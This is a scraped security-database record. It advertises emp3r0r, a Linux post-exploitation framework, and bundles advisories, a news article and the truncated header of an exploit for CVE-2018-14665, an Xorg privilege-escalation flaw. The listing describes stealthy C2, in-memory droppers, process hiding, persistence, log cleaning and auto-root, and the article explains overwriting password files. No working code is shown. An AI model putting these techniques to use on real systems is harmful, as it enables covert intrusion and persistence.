why not? i dont see many post-exploitation frameworks for linux systems, even if there were, they are nothing like mine
as a linux user, the most critical thing for remote administration is terminal . if you hate the garbage reverse shell experience (sometimes it aint even a shell), take a look at emp3r0r, you will be impressed
yes i just want to make a post-exploitation tool for linux users like me, who want better experience in their hacking
another reason is compatibility. as emp3r0r is mostly written in Go , and fully static (so are all the plugins used by emp3r0r), it will run everywhere (tested on Linux 2.6 and above) you want, regardless of the shitty environments. in some cases you wont even find bash on your target, dont worry, emp3r0r uploads its own bash and many other useful tools
why is it called emp3r0r ? because theres an empire
i hope this tool helps you, and i will add features to it as i learn new things
also, emp3r0r has its own CA pool, agents trusts only emp3r0r's own CA (which you can generate using build.py ), making MITM attack much harder
below is a screenshot of emp3r0r's CC server, which has 3 agent coming from 3 different transports
auto proxy for agents without direct internet access
emp3r0r agents check if they have internet access on start, and start a socks5 proxy if they do, then they broadcast their proxy addresses (in encrypted form) on each network they can reach
if an agent doesn't have internet, its going to listen for such broadcasts. when it receives a working proxy, it starts a port mapping of that proxy and broadcasts it to its own networks, bringing the proxy to every agent it can ever touch, and eventually bring all agents to our CC server.
in the following example, we have 3 agents, among which only one ( [1] ) has internet access, and [0] has to use the proxy passed by [2]
agent traffic
every time an agent starts, it checks a preset URL for CC status, if it knows CC is offline, no further action will be executed, it waits for CC to go online
you can set the URL to a GitHub page or other less suspicious sites, your agents will poll that URL every random minutes
no CC communication will happen when the agent thinks CC is offline
if it isnt:
bare HTTP2 traffic:
when using Cloudflare CDN as CC frontend:
packer - start agent in memory
packer encrypts agent binary, and runs it from memory (using memfd_create )
currently emp3r0r is mostly memory-based, if used with this packer
dropper - pure memory based agent launching
dropper drops a shellcode or script on your target, eventually runs your agent, in a stealth way
below is a screenshot of a python based shellcode delivery to agent execution:
hide processes and files
currently emp3r0r uses libemp3r0r to hide its files and processes, which utilizes glibc hijacking
{"id": "KITPLOIT:3275186406797911565", "bulletinFamily": "tools", "title": "Emp3R0R - Linux Post-Exploitation Framework Made By Linux User", "description": "[  ](<https://1.bp.blogspot.com/-ebyn50hsMeU/X_lPY2STkrI/AAAAAAAAU5s/2Bq8MVwb26EODfof9fQDAAPOT8aPnGedgCNcBGAsYHQ/s1406/emp3r0r_01.png>)\n\n \n\n\nlinux [ post-exploitation ](<https://www.kitploit.com/search/label/Post-Exploitation> \"post-exploitation\" ) framework made by linux user \n\n** Still under active development **\n\n * [ \u4e2d\u6587\u4ecb\u7ecd ](<https://www.freebuf.com/sectool/259079.html> \"\u4e2d\u6587\u4ecb\u7ecd\" )\n * [ check my blog for updates ](<https://jm33.me/emp3r0r-0x00.html> \"check my blog for updates\" )\n * [ how to use ](<https://github.com/jm33-m0/emp3r0r/wiki> \"how to use\" )\n\n \n\n\n** what to expect (in future releases) ** \n\n\n * packer: cryptor + ` memfd_create `\n * packer: use ` shm_open ` in older Linux kernels \n * dropper: shellcode injector - python \n * injector: inject shellcode into another process, using GDB \n * port mapping: forward from CC to agents, so you can use encapsulate other tools (such as Cobalt Strike) in emp3r0r's CC tunnel \n * dropper: shellcode injector - dd \n * dropper: downloader (stage 0) shellcode \n * network scanner \n * passive scanner, for host/service discovery \n * exploit kit \n * conservative weak [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) scanner \n * auto pwn using weak credentials and RCEs \n \n** why another post-exploitation tool? ** \n\n\nwhy not? i dont see many post-exploitation frameworks for linux systems, even if there were, they are nothing like mine \n\nas a linux user, the most critical thing for [ remote administration ](<https://www.kitploit.com/search/label/Remote%20Administration> \"remote administration\" ) is ** terminal ** . if you hate the garbage reverse shell experience (sometimes it aint even a shell), take a look at emp3r0r, you will be impressed \n\nyes i just want to make a post-exploitation tool for linux users like me, who want better experience in their hacking \n\nanother reason is compatibility. as emp3r0r is mostly written in [ Go ](<https://golang.org> \"Go\" ) , and fully static (so are all the plugins used by emp3r0r), it will run everywhere (tested on Linux 2.6 and above) you want, regardless of the shitty environments. in some cases you wont even find bash on your target, dont worry, emp3r0r uploads its own [ bash ](<https://github.com/jm33-m0/static-bins/tree/main/vaccine> \"bash\" ) and many other useful tools \n\nwhy is it called ` emp3r0r ` ? because theres an [ empire ](<https://github.com/BC-SECURITY/empire> \"empire\" )\n\ni hope this tool helps you, and i will add features to it as i learn new things \n\n \n** what does it do ** \n \n** glance ** \n\n\n * beautiful terminal UI \n * ** perfect reverse shell ** (true color, key bindings, custom bashrc, custom bash binary, etc) \n * auto ** persistence ** via various methods \n * ** post-exploitation tools ** like nmap, socat, are integreted with reverse shell \n * ** credential harvesting **\n * process ** injection **\n * ELF ** patcher **\n * ** hide processes and files ** via libc hijacking \n * port mapping, socks5 ** proxy **\n * auto root \n * ** LPE ** suggest \n * system info collecting \n * file management \n * log cleaner \n * ** stealth ** connection \n * internet access checker \n * ** autoproxy ** for semi-isolated networks \n * all of these in one ** HTTP2 ** connection \n * can be encapsulated in any external proxies such as ** TOR ** , and ** CDNs **\n * and many more... \n \n** core features ** \n \n** transports ** \n\n\nemp3r0r utilizes [ HTTP2 ](<https://github.com/posener/h2conn> \"HTTP2\" ) (TLS enabled) for its CC communication, but you can also encapsulate it in other transports such as [ TOR ](<https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor> \"TOR\" ) , and [ CDNs ](<https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#cdn> \"CDNs\" ) . all you need to do is [ tell emp3r0r agent to use your proxy ](<https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor-1> \"tell emp3r0r agent to use your proxy\" )\n\nalso, emp3r0r has its own CA pool, agents trusts only emp3r0r's own CA (which you can [ generate ](<https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#build-cc> \"generate\" ) using ` build.py ` ), making MITM attack much harder \n\nbelow is a screenshot of emp3r0r's CC server, which has 3 agent coming from 3 different transports \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-RDh3XVUeUZ0/X_lPiSvxCnI/AAAAAAAAU5w/sUXx4qinrFUWjS3HWtwWt1Y6YYgFP8eJgCNcBGAsYHQ/s1406/emp3r0r_01.png>)\n\n \n\n\n** auto proxy for agents without direct internet access ** \n\n\nemp3r0r agents check if they have internet access on start, and start a socks5 proxy if they do, then they broadcast their proxy addresses (in encrypted form) on each network they can reach \n\nif an agent doesn't have internet, its going to listen for such broadcasts. when it receives a working proxy, it starts a port mapping of that proxy and broadcasts it to its own networks, bringing the proxy to every agent it can ever touch, and eventually bring all agents to our CC server. \n\nin the following example, we have 3 agents, among which only one ( ` [1] ` ) has internet access, and ` [0] ` has to use the proxy passed by ` [2] `\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-6JSXZbLtxEo/X_lPoUVw4FI/AAAAAAAAU50/_qpNf6-TimEcJJj8XvcDQtG4fjV_rUVVACNcBGAsYHQ/s880/emp3r0r_02.png>)\n\n \n\n\n** agent traffic ** \n\n\nevery time an agent starts, it checks a preset URL for CC status, if it knows CC is offline, no further action will be executed, it waits for CC to go online \n\nyou can set the URL to a GitHub page or other less suspicious sites, your agents will poll that URL every random minutes \n\nno CC communication will happen when the agent thinks CC is offline \n\nif it isnt: \n\nbare HTTP2 traffic: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-aSsDA_EsuOc/X_lPuif28xI/AAAAAAAAU58/kki2axaE3XQykmyy9xbNwn4SXw8ziW2wgCNcBGAsYHQ/s1754/emp3r0r_03.png>)\n\nwhen using Cloudflare CDN as CC frontend: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-UzeO5H62uss/X_lP5OO4wUI/AAAAAAAAU6E/WYva575RkPMSzlwR73P5cCPQzX_UjCoRgCNcBGAsYHQ/s1920/emp3r0r_04.png>)\n\n \n\n\n** packer - start agent in memory ** \n\n\n[ packer ](<https://github.com/jm33-m0/emp3r0r/wiki/Packer> \"packer\" ) encrypts ` agent ` binary, and runs it from memory (using ` memfd_create ` ) \n\ncurrently emp3r0r is mostly memory-based, if used with this packer \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-x1e8iTZUB9s/X_lQBPOAZTI/AAAAAAAAU6M/gwsOguKPeN0mzWW9Sp8bU30FtviKwUL9gCNcBGAsYHQ/s1758/emp3r0r_05.png>)\n\n \n\n\n** dropper - pure memory based agent launching ** \n\n\n[ dropper ](<https://github.com/jm33-m0/emp3r0r/wiki/Dropper> \"dropper\" ) drops a shellcode or script on your target, eventually runs your agent, in a stealth way \n\nbelow is a screenshot of a python based shellcode delivery to agent execution: \n\n[  ](<https://github.com/jm33-m0/emp3r0r/blob/master/img/dropper.webp> \"linux post-exploitation framework made by linux user \\(43\\)\" )\n\n \n** hide processes and files ** \n\n\ncurrently emp3r0r uses [ libemp3r0r ](<https://github.com/jm33-m0/emp3r0r/tree/master/libemp3r0r> \"libemp3r0r\" ) to hide its files and processes, which utilizes glibc hijacking \n\n \n** persistence ** \n\n\ncurrently implemented methods: \n\n * [ libemp3r0r ](<https://github.com/jm33-m0/emp3r0r/tree/master/libemp3r0r> \"libemp3r0r\" )\n * cron \n * bash profile and command injection \n\nmore will be added in the future \n\n \n** modules ** \n \n** basic command shell ** \n\n\nthis is ** not a shell ** , it just executes any commands you send with ` sh -c ` and sends the result back to you \n\nbesides, it provides several useful helpers: \n\n * file management: ` put ` and ` get `\n * command autocompletion \n * ` #net ` shows basic network info, such as ` ip a ` , ` ip r ` , ` ip neigh `\n * ` #kill ` processes, and a simple ` #ps `\n * ` bash ` !!! this is the real bash shell, keep on reading! \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-4CKoYSXwrx4/X_lQLa7qBYI/AAAAAAAAU6U/zWEj7WzLlPI5MSMX7Ly37lbSXn9J9fmkQCNcBGAsYHQ/s1405/emp3r0r_07.png>)\n\n \n\n\n** fully interactive and stealth bash shell ** \n\n\na reverse bash shell, started with custom ` bash ` binary and ` bashrc ` , leaving no trace on the system shell \n\nemp3r0r's terminal supports ** everything your current terminal supports ** , you can use it just like an [ openssh ](<https://www.openssh.com/> \"openssh\" ) session \n\nbut wait, it's more than just a reverse bash shell, with [ module vaccine ](<https://github.com/jm33-m0/static-bins/tree/main/vaccine> \"module vaccine\" ) , you can use whatever tool you like on your target system \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-6TRtZgfuCTU/X_lQUVOk_cI/AAAAAAAAU6c/yjFUFPswZ1UPybunzvI1FQnvp_rAXUk7ACNcBGAsYHQ/s1412/emp3r0r_08.png>)\n\n \n\n\n** credential harvesting ** \n\n\nnot implemented yet \n\ni wrote about this in my [ blog ](<https://jm33.me/sshd-injection-and-password-harvesting.html> \"blog\" )\n\n \n** auto root ** \n\n\ncurrently emp3r0r supports [ CVE-2018-14665 ](<https://jm33.me/sshd-injection-and-password-harvesting.html> \"CVE-2018-14665\" ) , agents can exploit this [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) if possible, and restart itself with root privilege \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-2hJDiez46XA/X_lQbzj0wpI/AAAAAAAAU6k/lGIslle3NcolgrHjmuzf75hZL8PljmKiwCNcBGAsYHQ/s680/emp3r0r_09.png>)\n\n \n\n\n** LPE suggest ** \n\n\nupload the latest: \n\n * [ mzet-/linux-exploit-suggester ](<https://github.com/mzet-/linux-exploit-suggester> \"mzet-/linux-exploit-suggester\" )\n * [ pentestmonkey/unix-privesc-check ](<https://github.com/pentestmonkey/unix-privesc-check> \"pentestmonkey/unix-privesc-check\" )\n\nand run them on target system, return the results \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-dwR5eysxREw/X_lQhIRfQNI/AAAAAAAAU6o/homwn1vZglwtF2fJxPo7hb9h3Dy67Cc6wCNcBGAsYHQ/s1280/emp3r0r_10.png>)\n\n \n\n\n** port mapping ** \n\n\nmap any target addresses to CC side, using HTTP2 (or whatever transport your agent uses) \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-QVv1X1MFq9o/X_lQmgsCpZI/AAAAAAAAU6w/Z75lOl5o0fQZytPA-QdA3g_Woqgw97tygCNcBGAsYHQ/s1134/emp3r0r_11.png>)\n\n \n\n\n** plugin system ** \n\n\nyes, there is a plugin system. please read the [ wiki ](<https://github.com/jm33-m0/emp3r0r/wiki/Plugins> \"wiki\" ) for more information \n\n[  ](<https://1.bp.blogspot.com/-QWG5o2SiEv8/X_lQsm2SndI/AAAAAAAAU64/MjjHhhBShbwj6GanqGltpc2OXasKPww7gCNcBGAsYHQ/s817/emp3r0r_12.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-95HW3W3R-Pg/X_lQsjAIS8I/AAAAAAAAU68/tFOALiRQbi86nFjeaiQowidctPsS3-vPgCNcBGAsYHQ/s1274/emp3r0r_13.png>)\n\n \n\n\n** thanks ** \n\n\n * [ pty ](<https://github.com/creack/pty> \"pty\" )\n * [ guitmz ](<https://github.com/guitmz> \"guitmz\" )\n * [ readline ](<https://github.com/bettercap/readline> \"readline\" )\n * [ h2conn ](<https://github.com/posener/h2conn> \"h2conn\" )\n * [ diamorphine ](<https://github.com/m0nad/Diamorphine> \"diamorphine\" )\n * [ Upgrading Simple Shells to Fully Interactive TTYs ](<https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/> \"Upgrading Simple Shells to Fully Interactive TTYs\" )\n \n \n\n\n** [ Download Emp3R0R ](<https://github.com/jm33-m0/emp3r0r> \"Download Emp3R0R\" ) **\n", "published": "2021-01-09T11:30:05", "modified": "2021-01-09T11:30:05", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://www.kitploit.com/2021/01/emp3r0r-linux-post-exploitation.html", "reporter": "KitPloit", "references": ["https://github.com/pentestmonkey/unix-privesc-check", "https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#build-cc", "https://github.com/jm33-m0/emp3r0r/wiki/Packer", "https://github.com/bettercap/readline", "https://github.com/jm33-m0/static-bins/tree/main/vaccine", "https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor", "https://github.com/jm33-m0/emp3r0r/wiki/Dropper", "https://github.com/mzet-/linux-exploit-suggester", "https://github.com/jm33-m0/emp3r0r/blob/master/img/dropper.webp", "https://github.com/jm33-m0/emp3r0r", "https://github.com/jm33-m0/emp3r0r/tree/master/libemp3r0r", "https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor-1", "https://github.com/guitmz", "https://github.com/m0nad/Diamorphine", "https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#cdn", "https://github.com/BC-SECURITY/empire", "https://github.com/jm33-m0/emp3r0r/wiki", "https://github.com/jm33-m0/emp3r0r/wiki/Plugins", "https://github.com/posener/h2conn", "https://github.com/creack/pty"], "cvelist": ["CVE-2018-14665"], "type": "kitploit", "lastseen": "2021-01-09T15:32:23", "edition": 1, "viewCount": 72, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-14665"]}, {"type": "f5", "idList": ["F5:K03073656"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704328", "OPENVAS:1361412562310843800", "OPENVAS:1361412562310876007", "OPENVAS:1361412562310882986", "OPENVAS:1361412562311220201236", "OPENVAS:1361412562311220192553", "OPENVAS:1361412562311220192123", "OPENVAS:1361412562310875244", "OPENVAS:1361412562311220201062", "OPENVAS:1361412562310852126"]}, {"type": "fedora", "idList": ["FEDORA:868B960B9EC7", "FEDORA:89D3F649CE94"]}, {"type": "exploitdb", "idList": ["EDB-ID:45832", "EDB-ID:45938", "EDB-ID:47701", "EDB-ID:45908", "EDB-ID:45742", "EDB-ID:45697", "EDB-ID:45922", "EDB-ID:46142"]}, {"type": "zdt", "idList": ["1337DAY-ID-31674", "1337DAY-ID-31593", "1337DAY-ID-33531", "1337DAY-ID-31731", "1337DAY-ID-31437", "1337DAY-ID-31436", "1337DAY-ID-33404", "1337DAY-ID-31947", "1337DAY-ID-31466"]}, {"type": "avleonov", "idList": ["AVLEONOV:1FF4C326FCF56EF1AA19C766216E191C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155276", "PACKETSTORM:149957", "PACKETSTORM:150450", "PACKETSTORM:154942", "PACKETSTORM:150620", "PACKETSTORM:149958", "PACKETSTORM:150042", "PACKETSTORM:150295", "PACKETSTORM:151136", "PACKETSTORM:150554"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER", "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER_MODULEPATH", "MSF:EXPLOIT/AIX/LOCAL/XORG_X11_SERVER"]}, {"type": "gentoo", "idList": ["GLSA-201810-09"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:ADC2F0547F06456887993FC83AC31CB3", "EXPLOITPACK:42DE7B337F917EBF2EF618E51199BCA2", "EXPLOITPACK:36340A6356958B8A5C9291F39ED5BA27", "EXPLOITPACK:4939A42DDD3D9DDC0BB267A685A819B9", "EXPLOITPACK:CE863F6931CD376B67EB8A13F5A7E4E2", "EXPLOITPACK:6CADE2C9086A89E6055B6A71CB230062"]}, {"type": "aix", "idList": ["XORG_ADVISORY3.ASC"]}, {"type": "redhat", "idList": ["RHSA-2018:3410"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4328-1:FB5A7"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3800-1"]}, {"type": "thn", "idList": ["THN:8589C696FD99566AD522DE3118ECE8B9"]}, {"type": "archlinux", "idList": ["ASA-201810-15"]}, {"type": "centos", "idList": ["CESA-2018:3410"]}, {"type": "ubuntu", "idList": ["USN-3802-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-3410", "ELSA-2019-2079"]}, {"type": "threatpost", "idList": ["THREATPOST:520C7CCDFE034FB0F8AFF7B86FD555B2"]}, {"type": "nessus", "idList": ["AIX_IJ11546.NASL", "SUSE_SU-2018-3680-1.NASL", "EULEROS_SA-2019-2123.NASL", "EULEROS_SA-2020-1236.NASL", "OPENSUSE-2018-1420.NASL", "AIX_IJ11544.NASL", "AIX_IJ11549.NASL", "UBUNTU_USN-3802-1.NASL", "OPENSUSE-2019-915.NASL", "GENTOO_GLSA-201810-09.NASL"]}], "modified": "2021-01-09T15:32:23", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-09T15:32:23", "rev": 2}, "vulnersScore": 6.7}, "toolHref": "https://github.com/jm33-m0/emp3r0r"}
{"cve": [{"lastseen": "2020-12-09T20:25:35", "description": "A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.", "edition": 9, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-25T20:29:00", "title": "CVE-2018-14665", "type": "cve", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14665"], "modified": "2019-10-22T23:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-14665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14665", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:33", "bulletinFamily": "software", "cvelist": ["CVE-2018-14665"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-11-24T01:19:00", "published": "2018-11-24T01:19:00", "id": "F5:K03073656", "href": "https://support.f5.com/csp/article/K03073656", "title": "X.Org X server vulnerability CVE-2018-14665", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "**CentOS Errata and Security Advisory** CESA-2018:3410\n\n\nX.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.\n\nSecurity Fix(es):\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-December/035169.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2018-November/005745.html\n\n**Affected packages:**\nxorg-x11-server\nxorg-x11-server-Xdmx\nxorg-x11-server-Xephyr\nxorg-x11-server-Xnest\nxorg-x11-server-Xorg\nxorg-x11-server-Xvfb\nxorg-x11-server-Xwayland\nxorg-x11-server-common\nxorg-x11-server-devel\nxorg-x11-server-source\n\n**Upstream details at:**\n", "edition": 86, "modified": "2018-12-13T20:46:13", "published": "2018-11-15T19:12:13", "id": "CESA-2018:3410", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2018-November/005745.html", "title": "xorg security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-07-03T05:58:32", "bulletinFamily": "info", "cvelist": ["CVE-2018-14665"], "description": "A local privilege-escalation and file-overwrite vulnerability in X.Org X server opens the door to trivial compromise in Linux systems that use the open-source software.\n\nThe X server is a core graphics and windowing technology that can be found in most Linux and BSD distributions that use a graphical user interface (GUI). The vulnerability ([CVE-2018-14665](<https://access.redhat.com/security/cve/cve-2018-14665>)) affects X server versions 1.19 and later, and has been around for at least two years. X.Org explained that if a vulnerable version of X.org runs on a system as \u201csetuid\u201d root, a logged-in user can use it to gain administrator-level privileges on the machine. From there, the user can create or overwrite files, anywhere on the system, including files owned by privileged users (i.e., an adversary could tamper with data or install malware).\n\nUncovered by security researcher Narendra Shinde, the issue arises because of an \u201cincorrect command-line parameter validation.\u201d Essentially, the system doesn\u2019t check for correct permissions when someone uses the -modulepath or -logfile command line switches. Both are root-privileged X.org processes.\n\nRed Hat issued its own [report](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665>), describing the vulnerability as \u201can incorrect permission check for -modulepath and -logfile options when starting X.Org.\u201d As such, \u201cX server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.\u201d\n\nIn the case of -modulepath, a user can inject code into the process; while the -logfile command can be used to overwrite the \u201cshadow\u201d password file so that the root user can log on without authentication.\n\n\u201cOverwriting /etc/shadow with -logfile can also lead to privilege-elevation since it\u2019s possible to control some part of the written log file, for example using the -fp option to set the font search path (which is logged) and thus inject a line that will be considered as valid by some systems,\u201d X.Org said in a mailing list [post](<https://lists.x.org/archives/xorg-announce/2018-October/002927.html>) last week.\n\nThe attacker needs to already have an active console session going in order to successfully exploit the problem, according to Shinde \u2014 so in other words, the vulnerability won\u2019t let an attacker gain initial access to the system. He explained in a separate [posting](<https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html>) that \u201cunpatched systems can be exploited by non-root users if X server is running with elevated privileges.\u201d\n\nOther researchers noted however that when used in combination with other exploits, it\u2019s possible for adversaries to gain complete control if they already have a lower privileged account.\n\nMatthew Hickey of the Hacker House for instance [shared](<https://twitter.com/hackerfantastic/status/1055568290112831490/>) a proof-of-concept exploit on Twitter, noting that the flaw is easy to exploit: \u201cCVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less.\u201d\n\nThe issue was also [confirmed](<https://twitter.com/_bcoles/status/1055593201539538944>) by security researcher Brendan Coles as working on CentOS 7.4, though he called the scenario \u201cunlikely\u201d given the need for an attacker to already have access to the system.\n\nA [patch](<https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330e>) is available in the X server repository, and many distros, including [OpenBSD](<https://ftp.openbsd.org/pub/OpenBSD/patches/6.4/common/001_xserver.patch.sig>), [Red Hat](<https://access.redhat.com/security/cve/cve-2018-14665>), [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14665.html>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2018-14665>), [SUSE](<https://www.suse.com/security/cve/CVE-2018-14665/>) and [Fedora](<https://bugzilla.redhat.com/show_bug.cgi?id=1643131>), have issued their own advisories. X.Org also said that there\u2019s a workaround:\n\n> \u201cIf a patched version of the X server is not available, X.Org recommends to remove the setuid bit (ie chmod 755) of the installed Xorg binary. Note that this can cause issues if people are starting the X window system using the \u2018startx\u2019, \u2018xinit\u2019 commands or variations thereof.\u201d\n\nLinux distros that don\u2019t use X.org with elevated privileges are immune from the flaw.\n\nSecurity firm Tenable [issued](<https://www.tenable.com/blog/tweetable-exploit-for-x-org-server-local-privilege-escalation-cve-2018-14665-released>) its own assessment: \u201cBecause of the limited range of affected versions and the specific and often non-default configurations required to trigger this exploit, the attack\u2019s scope appears to be narrow. However, it\u2019s likely that malicious individuals will still seek out vulnerable systems.\u201d\n", "modified": "2018-10-29T16:13:26", "published": "2018-10-29T16:13:26", "id": "THREATPOST:520C7CCDFE034FB0F8AFF7B86FD555B2", "href": "https://threatpost.com/x-org-flaw-allows-privilege-escalation-in-linux-systems/138624/", "type": "threatpost", "title": "X.Org Flaw Allows Privilege Escalation in Linux Systems", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-12-12T07:57:08", "description": "Exploit for aix platform in category local exploits", "edition": 1, "published": "2018-12-04T00:00:00", "title": "Xorg X11 Server (AIX) - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-04T00:00:00", "id": "1337DAY-ID-31731", "href": "https://0day.today/exploit/description/31731", "sourceData": "# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation\r\n# Date: 29/11/2018\r\n# Exploit Author: @0xdono\r\n# Original Discovery and Exploit: Narendra Shinde\r\n# Vendor Homepage: https://www.x.org/\r\n# Platform: AIX\r\n# Version: X Window System Version 7.1.1\r\n# Fileset: X11.base.rte < 7.1.5.32\r\n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)\r\n# CVE: CVE-2018-14665\r\n#\r\n# Explanation:\r\n# Incorrect command-line parameter validation in the Xorg X server can\r\n# lead to privilege elevation and/or arbitrary files overwrite, when the\r\n# X server is running with elevated privileges.\r\n# The -logfile argument can be used to overwrite arbitrary files in the\r\n# file system, due to incorrect checks in the parsing of the option.\r\n#\r\n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n# It overwrites /etc/passwd in order to create a new user with root privile=\r\nges.=20\r\n# All currently logged in users need to be included when /etc/passwd is ove=\r\nrwritten,\r\n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to ch=\r\nange user.\r\n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on 